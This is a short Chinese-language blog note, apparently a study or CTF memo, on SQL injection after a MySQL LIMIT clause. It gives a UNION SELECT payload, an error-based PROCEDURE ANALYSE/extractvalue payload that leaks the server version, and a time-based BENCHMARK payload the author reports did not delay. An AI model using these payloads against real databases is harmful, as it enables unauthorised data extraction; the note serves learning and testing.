zoukankan      html  css  js  c++  java
  • 小结--limit注入

    0x01总结一下

    这种类型一般实际情况中在参数为start返回一些结果变量的时候,或者其他一些情况,在ctf中也比较多

    没有order by

    可以跟union select 进行查询

    mysql> select user from users limit 0,1 union select user from users;
    +-------+
    | user  |
    +-------+
    | admin |
    | test  |
    | sp4rk |
    | qwer  |
    +-------+
    

    有 order by

    这里具体原理可以参考文章 Mysql注入点在limit关键字后面的利用方法

    mysql> select user from users order by user_id limit 0,4 procedure analyse(extractvalue(1,concat(0x5e24,version(),0x5e24)),1);
    ERROR 1105 (HY000): XPATH syntax error: '^$5.5.53^$'
    基于时间  
    select user from users order by user_id limit 0,4 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5,BENCHMARK(5,SHA1(1)),1))))),1);
    不知道为什么我这里并没有延时....
    
  • 相关阅读:
    模型层
    视图层,模板层
    ORM表关系建立
    CMakeList入门
    C++标准模板库
    C++基本语法
    g++应用说明
    Linux快捷键
    Git 操作备忘
    Block的详细介绍
  • 原文地址:https://www.cnblogs.com/spark-xl/p/9085643.html
Copyright © 2011-2022 走看看